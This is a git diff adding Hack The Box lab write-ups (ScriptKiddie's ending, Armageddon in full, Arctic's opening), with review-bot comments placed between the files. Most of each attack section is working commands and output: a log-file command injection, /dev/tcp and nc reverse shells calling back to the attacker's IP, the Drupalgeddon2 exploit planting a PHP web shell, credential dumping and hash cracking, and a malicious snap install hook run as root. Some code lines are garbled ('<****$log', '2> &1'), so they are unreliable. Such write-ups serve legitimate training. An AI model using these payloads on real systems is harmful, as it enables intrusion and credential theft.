+ kid@scriptkiddie:~/html$ export TERM=screen-256color
+
+ #set the TTY rows and columns for vi / nano
+ kid@scriptkiddie:~/html$ stty rows 40 columns 125
+ kid@scriptkiddie:~/html$ reset
+
+
+
+Now that we have a fully interactive TTY shell let's upload linpeas onto the box:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ kid@scriptkiddie:~/html$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-08 12:04:57-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[====================================================>] 333.85K 2.03MB/s in 0.2s
+
+ 2021-06-08 12:04:57 (2.03 MB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ kid@scriptkiddie:~/html$ chmod +x /tmp/peas.sh
+ kid@scriptkiddie:~/html$ /tmp/peas.sh
+
+
+
+` 
+
+Scrolling through the output we see that there is another user on the box named **pwn** :
+
+
+
+So let's take a look at his home directory:
+
+
+ kid@scriptkiddie:~/html$ ls -lash /home/pwn
+ total 44K
+ 4.0K drwxr-xr-x 6 pwn pwn 4.0K Feb 3 12:06 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Feb 3 07:40 ..
+ 0 lrwxrwxrwx 1 root root 9 Feb 3 12:06 .bash_history -> /dev/null
+ 4.0K -rw-r--r-- 1 pwn pwn 220 Feb 25 2020 .bash_logout
+ 4.0K -rw-r--r-- 1 pwn pwn 3.7K Feb 25 2020 .bashrc
+ 4.0K drwx------ 2 pwn pwn 4.0K Jan 28 17:08 .cache
+ 4.0K drwxrwxr-x 3 pwn pwn 4.0K Jan 28 17:24 .local
+ 4.0K -rw-r--r-- 1 pwn pwn 807 Feb 25 2020 .profile
+ 4.0K -rw-rw-r-- 1 pwn pwn 74 Jan 28 16:22 .selected_editor
+ 4.0K drwx------ 2 pwn pwn 4.0K Feb 10 16:10 .ssh
+ 4.0K drwxrw---- 2 pwn pwn 4.0K Feb 3 12:00 recon
+ 4.0K -rwxrwxr-- 1 pwn pwn 250 Jan 28 17:57 scanlosers.sh
+ kid@scriptkiddie:~/html$ cd /home/pwn
+ kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
+ #!/bin/bash
+
+ log=/home/kid/logs/hackers
+
+ cd /home/pwn/
+ cat $log | cut -d' ' -f3- | sort -u | while read ip; do
+ sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
+ done
+
+ if [[ $(wc -l <****$log) -gt 0 ]]; then echo -n > $log; fi
+
+Here we see that there is a bashscript that takes a logfile from **/home/kid/logs/hackers** it, gets ip addresses from it and runs nmap against each of them. However the input isn't being sanitized, so let's use it to get a reverse shell:
+
+
+ kid@scriptkiddie:/home/pwn$ echo -n "Z Y 10.10.14.13;/bin/bash -c 'bash >& /dev/tcp/10.10.14.13/9003 0>&1' #" >/home/kid/logs/hackers
+
+
+And as soon as we run it we have a reverse shell connection:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/48 ] [~/HTB/ScriptKiddie]
+ → nc -lvnp 9003
+ listening on [any] 9003 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.226] 53822
+ id
+ uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
+
+
+
+This time we get access to the pwn user, So let's spawn a fully interactive TTY just like we previously did:
+
+
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ pwn@scriptkiddie:~$ ^Z
+ [1] + 3150958 suspended nc -lvnp 9003
+
+ [ 10.10.14.13/23 ] [ /dev/pts/48 ] [~/HTB/ScriptKiddie]
+ → stty raw -echo ; fg
+ [1] + 3150958 continued nc -lvnp 9003
+ export TERM=screen-256color
+ pwn@scriptkiddie:~$ export SHELL=bash
+ pwn@scriptkiddie:~$ stty rows 40 columns 200
+ pwn@scriptkiddie:~$ reset
+
+
+Now we run linpeas once again:
+
+
+ pwn@scriptkiddie:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh ; chmod +x /tmp/peas.sh ; /tmp/peas.sh
+
+
+
+This time we see the following:
+
+
+
+Apparently the pwn user can run **metasploit** as the root user, so let's do it:
+
+
+ pwn@scriptkiddie:~$ sudo -l
+ Matching Defaults entries for pwn on scriptkiddie:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User pwn may run the following commands on scriptkiddie:
+ (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
+ pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
+
+ pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
+
+
+ .:okOOOkdc' 'cdkOOOko:.
+ .xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
+ :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
+ 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
+ oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
+ dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
+ lOOOOOOOO. ;d; ,OOOOOOOOl
+ .OOOOOOOO. .; ; ,OOOOOOOO.
+ cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
+ oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
+ lOOOOO. .OOOO. :OOOO. ,OOOOOl
+ ;OOOO' .OOOO. :OOOO. ;OOOO;
+ .dOOo .OOOOocccxOOOO. xOOd.
+ ,kOl .OOOOOOOOOOOOO. .dOk,
+ :kk;.OOOOOOOOOOOOO.cOk:
+ ;kOOOOOOOOOOOOOOOk:
+ ,xOOOOOOOOOOOx,
+ .lOOOOOOOl.
+ ,dOd,
+ .
+
+ =[ metasploit v6.0.9-dev ]
+ + -- --=[ 2069 exploits - 1122 auxiliary - 352 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 7 evasion ]
+
+ Metasploit tip: Display the Framework log using the log command, learn more with help log
+
+ msf6 > bash
+ [*] exec: bash
+
+ root@scriptkiddie:/home/pwn# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@scriptkiddie:/home/pwn# cat /root/root.txt
+ 87XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there you go! We managed to get a root shell and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
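Review bot: two command lines in this hunk are broken as written and will fail if copied. In exploit.py the payload line `payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2> &1|nc 10.10.14.13 9001 >/tmp/f'` has a space in `2> &1`, which sh rejects (the redirect must be `2>&1`), and the `**` around it is markdown bold that leaked into the code block; the same leak turned the check in scanlosers.sh into `$(wc -l <****$log)`, where the script reads `wc -l <$log`. Strip the emphasis markers from both blocks. The sentence "However the input isn't being sanitized" should also explain why the injection line `echo -n "Z Y 10.10.14.13;/bin/bash -c 'bash >& /dev/tcp/10.10.14.13/9003 0>&1' #"` needs the two filler words: the script runs `cut -d' ' -f3-` on each line before handing it to `sh -c`, so fields 1 and 2 are discarded and everything from field 3 onward, including the `;`-chained command and the trailing `#` that comments out the rest of the nmap command line, lands unquoted inside the `sh -c` string. Smaller points: the Part 1 intro promises `-sC`/`-sV` but the only command shown is the `-p-` port sweep, so the service-detection output beneath it has no command above it and the `-sCV` scan that produced it should be added; the `sudo /opt/metasploit-framework-6.0.9/msfconsole` line appears twice in a row; the link text CVE2020-7384 should be CVE-2020-7384; and "Febuary" and "alot" are typos.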
diff --git a/Easy/59.md b/Easy/59.md
new file mode 100644
index 0000000..af082d4
--- /dev/null
+++ b/Easy/59.md
@@ -0,0 +1,419 @@
+# Armageddon Writeup
+
+
+
+## Introduction :
+
+Armageddon is an easy Linux box released back in March 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [~/HTB/Armagueddon]
+ → nmap -sCV 10.129.48.89
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [~/HTB/Armagueddon]
+ → nmap -vvv -p- 10.129.48.89 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.129.48.89
+ Discovered open port 22/tcp on 10.129.48.89
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [~/HTB/Armagueddon]
+ → nmap -sCV -p 22,80 10.129.48.89
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 14:39 CEST
+ Nmap scan report for 10.129.48.89
+ Host is up (0.46s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
+ | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
+ |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
+ 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
+ |_http-generator: Drupal 7 (http://drupal.org)
+ | http-robots.txt: 36 disallowed entries (15 shown)
+ | /includes/ /misc/ /modules/ /profiles/ /scripts/
+ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
+ | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
+ |_/LICENSE.txt /MAINTAINERS.txt
+ |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
+ |_http-title: Welcome to Armageddon | Armageddon
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 24.34 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+Just as like what we saw in our nmap scan results, this is a website running Drupal, and when we take a look at the page sourcecode we see get the confirmation that this is a Drupal 7 instance:
+
+
+
+Now in order to exploit it we can use [Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2)
+
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [~/HTB/Armagueddon]
+ → git clone https://github.com/dreadlocked/Drupalgeddon2
+ Cloning into 'Drupalgeddon2'...
+ remote: Enumerating objects: 257, done.
+ remote: Counting objects: 100% (4/4), done.
+ remote: Compressing objects: 100% (4/4), done.
+ remote: Total 257 (delta 0), reused 0 (delta 0), pack-reused 253
+ Receiving objects: 100% (257/257), 102.12 KiB | 202.00 KiB/s, done.
+ Resolving deltas: 100% (88/88), done.
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [~/HTB/Armagueddon]
+ → cd Drupalgeddon2
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [HTB/Armagueddon/Drupalgeddon2]
+ → ls -l
+ total 44
+ -rwxr-xr-x 1 nothing nothing 7262 Aug 5 15:39 drupalgeddon2-customizable-beta.rb
+ -rwxr-xr-x 1 nothing nothing 22954 Aug 5 15:39 drupalgeddon2.rb
+ -rw-r--r-- 1 nothing nothing 11388 Aug 5 15:39 README.md
+
+
+
+In order to run it we need the **highline** ruby gem:
+
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [HTB/Armagueddon/Drupalgeddon2]
+ → sudo gem install highline
+ [sudo] password for nothing:
+ Fetching highline-2.0.3.gem
+ Successfully installed highline-2.0.3
+ Parsing documentation for highline-2.0.3
+ Installing ri documentation for highline-2.0.3
+ Done installing documentation for highline after 2 seconds
+ 1 gem installed
+
+
+
+Once that's done we run it:
+
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [HTB/Armagueddon/Drupalgeddon2]
+ → ./drupalgeddon2.rb http://10.129.48.89
+ [*] --==[::#Drupalggedon2::]==--
+ --------------------------------------------------------------------------------
+ [i] Target : http://10.129.48.89/
+ --------------------------------------------------------------------------------
+ [+] Found : http://10.129.48.89/CHANGELOG.txt (HTTP Response: 200)
+ [+] Drupal!: v7.56
+ --------------------------------------------------------------------------------
+ [*] Testing: Form (user/password)
+ [+] Result : Form valid
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+ [*] Testing: Clean URLs
+ [!] Result : Clean URLs disabled (HTTP Response: 404)
+ [i] Isn't an issue for Drupal v7.x
+ --------------------------------------------------------------------------------
+ [*] Testing: Code Execution (Method: name)
+ [i] Payload: echo UJNQTJEV
+ [+] Result : UJNQTJEV
+ [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
+ --------------------------------------------------------------------------------
+ [*] Testing: Existing file (http://10.129.48.89/shell.php)
+ [i] Response: HTTP 404 // Size: 5
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+ [*] Testing: Writing To Web Root (./)
+ [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
+ [+] Result : <****?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2> &1' ); }
+ [+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
+ --------------------------------------------------------------------------------
+ [i] Fake PHP shell: curl 'http://10.129.48.89/shell.php' -d 'c=hostname'
+ armageddon.htb>>
+
+
+
+And it looks like we have a shell! however we see that it's not easy to navigate the system with it because of how limited it is:
+
+
+ armageddon.htb>> ls -lash
+ total 288K
+ 4.0K drwxr-xr-x. 9 apache apache 4.0K Aug 5 14:41 .
+ 0 drwxr-xr-x. 4 root root 33 Dec 3 2020 ..
+ 4.0K -rw-r--r--. 1 apache apache 317 Jun 21 2017 .editorconfig
+ 4.0K -rw-r--r--. 1 apache apache 174 Jun 21 2017 .gitignore
+ 8.0K -rw-r--r--. 1 apache apache 6.0K Jun 21 2017 .htaccess
+ 112K -rw-r--r--. 1 apache apache 109K Jun 21 2017 CHANGELOG.txt
+ 4.0K -rw-r--r--. 1 apache apache 1.5K Jun 21 2017 COPYRIGHT.txt
+ 4.0K -rw-r--r--. 1 apache apache 1.7K Jun 21 2017 INSTALL.mysql.txt
+ 4.0K -rw-r--r--. 1 apache apache 1.9K Jun 21 2017 INSTALL.pgsql.txt
+ 4.0K -rw-r--r--. 1 apache apache 1.3K Jun 21 2017 INSTALL.sqlite.txt
+ 20K -rw-r--r--. 1 apache apache 18K Jun 21 2017 INSTALL.txt
+ 20K -rw-r--r--. 1 apache apache 18K Nov 16 2016 LICENSE.txt
+ 12K -rw-r--r--. 1 apache apache 8.6K Jun 21 2017 MAINTAINERS.txt
+ 8.0K -rw-r--r--. 1 apache apache 5.3K Jun 21 2017 README.txt
+ 12K -rw-r--r--. 1 apache apache 9.9K Jun 21 2017 UPGRADE.txt
+ 8.0K -rw-r--r--. 1 apache apache 6.5K Jun 21 2017 authorize.php
+ 4.0K -rw-r--r--. 1 apache apache 720 Jun 21 2017 cron.php
+ 4.0K drwxr-xr-x. 4 apache apache 4.0K Jun 21 2017 includes
+ 4.0K -rw-r--r--. 1 apache apache 529 Jun 21 2017 index.php
+ 4.0K -rw-r--r--. 1 apache apache 703 Jun 21 2017 install.php
+ 4.0K drwxr-xr-x. 4 apache apache 4.0K Dec 4 2020 misc
+ 4.0K drwxr-xr-x. 42 apache apache 4.0K Jun 21 2017 modules
+ 0 drwxr-xr-x. 5 apache apache 70 Jun 21 2017 profiles
+ 4.0K -rw-r--r--. 1 apache apache 2.2K Jun 21 2017 robots.txt
+ 0 drwxr-xr-x. 2 apache apache 261 Jun 21 2017 scripts
+ 4.0K -rw-r--r--. 1 apache apache 75 Aug 5 14:41 shell.php
+ 0 drwxr-xr-x. 4 apache apache 75 Jun 21 2017 sites
+ 0 drwxr-xr-x. 7 apache apache 94 Jun 21 2017 themes
+ 20K -rw-r--r--. 1 apache apache 20K Jun 21 2017 update.php
+ 4.0K -rw-r--r--. 1 apache apache 2.2K Jun 21 2017 web.config
+ 4.0K -rw-r--r--. 1 apache apache 417 Jun 21 2017 xmlrpc.php
+ armageddon.htb>> pwd
+ /var/www/html
+ armageddon.htb>> cd sites
+
+ armageddon.htb>> pwd
+ /var/www/html
+
+ armageddon.htb>> which cd
+ /usr/bin/cd
+
+
+
+As you can see we can't use the cd command to change directories. But that's not an issue so we navigate to **sites/default/settings.php**
+
+
+ armageddon.htb>> cat sites/default/settings.php
+ <****?php
+
+ [...]
+
+ $databases = array (
+ 'default' =>
+ array (
+ 'default' =>
+ array (
+ 'database' => 'drupal',
+ 'username' => 'drupaluser',
+ 'password' => 'CQHEy@9M*m23gBVj',
+ 'host' => 'localhost',
+ 'port' => '',
+ 'driver' => 'mysql',
+ 'prefix' => '',
+ ),
+ ),
+ );
+
+ [...]
+
+ ?>
+
+ armageddon.htb>> cat /etc/passwd
+ root:x:0:0:root:/root:/bin/bash
+ bin:x:1:1:bin:/bin:/sbin/nologin
+ daemon:x:2:2:daemon:/sbin:/sbin/nologin
+ adm:x:3:4:adm:/var/adm:/sbin/nologin
+ lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ sync:x:5:0:sync:/sbin:/bin/sync
+ shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+ halt:x:7:0:halt:/sbin:/sbin/halt
+ mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ operator:x:11:0:operator:/root:/sbin/nologin
+ games:x:12:100:games:/usr/games:/sbin/nologin
+ ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+ nobody:x:99:99:Nobody:/:/sbin/nologin
+ systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
+ dbus:x:81:81:System message bus:/:/sbin/nologin
+ polkitd:x:999:998:User for polkitd:/:/sbin/nologin
+ sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+ postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+ apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
+ mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
+ brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
+
+now here we seem to have credentials for a mysql database, however the drupaluser doesn't appear in /etc/passwd, therefore we probably need to get password hashes from the database itself:
+
+
+ armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;'
+ name pass
+
+ brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
+
+
+
+now here we have a password hash, so let's crack it with john:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/20 ] [~/HTB/Armageddon]
+ → vim hash.txt
+
+ [ 10.10.14.34/23 ] [ /dev/pts/20 ] [~/HTB/Armageddon]
+ → cat hash.txt
+ $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
+
+ [ 10.10.14.34/23 ] [ /dev/pts/20 ] [~/HTB/Armageddon]
+ → john hash.txt -w=/usr/share/wordlists/rockyou.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
+ Cost 1 (iteration count) is 32768 for all loaded hashes
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ booboo (?)
+ 1g 0:00:00:00 DONE (2021-08-09 11:30) 2.439g/s 585.3p/s 585.3c/s 585.3C/s tiffany..chris
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+
+And we have brucetherealadmin's password! Now let's try to login via SSH:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/20 ] [~/HTB/Armageddon]
+ → ssh brucetherealadmin@10.129.48.89
+ The authenticity of host '10.129.48.89 (10.129.48.89)' can't be established.
+ ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.129.48.89' (ECDSA) to the list of known hosts.
+ brucetherealadmin@10.129.48.89's password:
+ Last login: Tue Mar 23 12:40:36 2021 from 10.10.14.2
+ [brucetherealadmin@armageddon ~]$ id
+ uid=1000(brucetherealadmin) gid=1000(brucetherealadmin) groups=1000(brucetherealadmin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+ [brucetherealadmin@armageddon ~]$ ls -lash
+ total 16K
+ 0 drwx------. 2 brucetherealadmin brucetherealadmin 99 Dec 14 2020 .
+ 0 drwxr-xr-x. 3 root root 31 Dec 3 2020 ..
+ 0 lrwxrwxrwx. 1 root root 9 Dec 11 2020 .bash_history -> /dev/null
+ 4.0K -rw-r--r--. 1 brucetherealadmin brucetherealadmin 18 Apr 1 2020 .bash_logout
+ 4.0K -rw-r--r--. 1 brucetherealadmin brucetherealadmin 193 Apr 1 2020 .bash_profile
+ 4.0K -rw-r--r--. 1 brucetherealadmin brucetherealadmin 231 Apr 1 2020 .bashrc
+ 4.0K -r--------. 1 brucetherealadmin brucetherealadmin 33 Aug 9 10:03 user.txt
+ [brucetherealadmin@armageddon ~]$ cat user.txt
+ 58XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to login and get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get to the root flag. We first need to enumerate the box, to do so we can use linpeas.sh:
+
+
+ [terminal 1]
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Armageddon]
+ → cp /home/nothing/HTB/Academy/linpeas.sh .
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Armageddon]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [terminal 2]
+ [brucetherealadmin@armageddon ~]$ curl http://10.10.14.34:9090/linpeas.sh > /tmp/peas.sh
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 333k 100 333k 0 0 120k 0 0:00:02 0:00:02 --:--:-- 120k
+ [brucetherealadmin@armageddon ~]$ chmod +x /tmp/peas.sh
+ [brucetherealadmin@armageddon ~]$ /tmp/peas.sh
+
+
+
+` 
+
+Let it run, and then when we check the output we see the following:
+
+
+
+Looks like we are able to run **snap** as the root user without any password, therefore let's use the [gtfobin](https://gtfobins.github.io/gtfobins/snap/) for snap:
+
+
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Armageddon]
+ → sudo gem install fpm
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Armageddon]
+ → COMMAND='bash -c "bash -i >& /dev/tcp/10.10.14.34/9001 0>&1"'
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Armageddon]
+ → cd $(mktemp -d)
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → mkdir meta/hooks/ -p
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → chmod +x meta/hooks/install
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → fpm -n privesc -s dir -t snap -a all meta
+ Created package {:path=>"privesc_1.0_all.snap"}
+
+
+
+Now we upload the malicious privesc snap file to the machine and run it:
+
+
+ [term1]
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → ls -lash
+ total 16K
+ 4.0K drwx------ 3 nothing nothing 4.0K Aug 9 12:40 .
+ 4.0K drwxrwxrwt 23 root root 4.0K Aug 9 12:40 ..
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 9 12:40 meta
+ 4.0K -rw-r--r-- 1 nothing nothing 4.0K Aug 9 12:40 privesc_1.0_all.snap
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → md5sum privesc_1.0_all.snap
+ 1159d305989905e39a5f9a8e63ba35ed privesc_1.0_all.snap
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ [brucetherealadmin@armageddon ~]$ curl http://10.10.14.34:9090/privesc_1.0_all.snap > /tmp/privesc.snap
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 4096 100 4096 0 0 4446 0 --:--:-- --:--:-- --:--:-- 4452
+ [brucetherealadmin@armageddon ~]$ md5sum /tmp/privesc.snap
+ 1159d305989905e39a5f9a8e63ba35ed /tmp/privesc.snap
+
+
+
+both the file hashes match therefore the transfer was successful. Now let's run snap as the root user to make use of the snap package we created:
+
+
+ [term 1]
+
+ [brucetherealadmin@armageddon tmp]$ sudo snap install /tmp/privesc.snap --dangerous --devmode
+ Run install hook of "privesc" snap if present
+
+ [term 2]
+
+ [ 10.10.14.34/23 ] [ /dev/pts/7 ] [/tmp/tmp.uYjIjYciPg]
+ → nc -lvnp 9001
+ Listening on 0.0.0.0 9001
+ Connection received on 10.129.48.89 57430
+ bash: cannot set terminal process group (18084): Inappropriate ioctl for device
+ bash: no job control in this shell
+ bash-4.3# id
+ id
+ uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
+ bash-4.3# cat /root/root.txt
+ cat /root/root.txt
+ 34XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
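Review bot: the `sudo -l` output that the whole privesc rests on ("Looks like we are able to run **snap** as the root user without any password") is only referenced through an image that is not in this diff, and so is the linpeas finding it came from ("we see the following:" is followed by nothing); paste the relevant `sudo -l` line as text so a reader can verify the claim without the screenshot. Two details at `sudo snap install /tmp/privesc.snap --dangerous --devmode` deserve a sentence each: `--dangerous` is what allows an unsigned, locally built snap to install at all (snapd skips the assertion/signature check), and the trailing `false` in `printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install` makes the install fail after the hook has already executed as root, so the package is not left installed on the box. The hook running as root is confirmed by `uid=0(root) ... context=system_u:system_r:unconfined_service_t:s0` in the listener, which is also worth pointing out since the SELinux context shows the shell is coming from the snapd service, not from the sudo session. Minor: the md5sum comparison is an integrity check for the transfer only, which is fine, and "Here we can see the progress graph :" under Conclusion ends without the image link.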
diff --git a/Easy/6.md b/Easy/6.md
new file mode 100644
index 0000000..b666bf5
--- /dev/null
+++ b/Easy/6.md
@@ -0,0 +1,385 @@
+# Arctic Writeup
+
+
+
+## Introduction :
+
+Arctic is an easy Windows box released back in March 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. The additional -Pn tells nmap that to skip the ping probes, because the box could be blocking them and because we know that the box is actually online.
+
+
+ **λ nihilist [~/_HTB/Beep] → nmap 10.10.10.11 -sC -sV -Pn**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 21:58 CET
+ Nmap scan report for 10.10.10.11
+ Host is up (0.033s latency).
+
+ PORT STATE SERVICE VERSION
+ 135/tcp open msrpc Microsoft Windows RPC
+ 8500/tcp open fmtp?
+ 49154/tcp open msrpc Microsoft Windows RPC
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 133.85 seconds
+
+
+
+We don't get that much to work with, but we will investigate the 8500th port for the next part.
+
+## **Part 2 : Getting User Access**
+
+Let's investigate the 8500th port by checking what lies at the following url : http://10.10.10.11:8500/
+
+We'll test it by opening up our web browser, and using the curl command. Let's use the following syntax : **curl -vsk http://10.10.10.11:8500**
+
+
+ **λ nihilist [ 127.0.0.1 ] [~] → curl --help**
+ -k, --insecure Allow insecure server connections when using SSL
+ -s, --silent Silent mode
+ -v, --verbose Make the operation more talkative
+
+
+
+ **λ nihilist [ 127.0.0.1 ] [~] → curl -vsk http://10.10.10.11:8500/**
+ * Trying 10.10.10.11:8500...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.11 (10.10.10.11) port 8500 (#0)
+ > GET / HTTP/1.1
+ > Host: 10.10.10.11:8500
+ > User-Agent: curl/7.66.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ * HTTP 1.0, assume close after body
+ < HTTP/1.0 200 OK
+ < Date: Tue, 12 Nov 2019 17:38:14 GMT
+ < Content-Type: text/html; charset=utf-8
